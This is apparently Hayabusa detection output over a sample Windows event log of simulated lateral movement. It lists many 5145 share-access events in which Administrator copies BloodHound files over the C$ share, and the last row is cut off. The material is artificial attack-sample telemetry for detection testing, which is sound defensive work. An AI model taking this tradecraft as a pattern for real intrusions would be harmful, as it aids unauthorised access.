2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.838 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.858 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.888 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 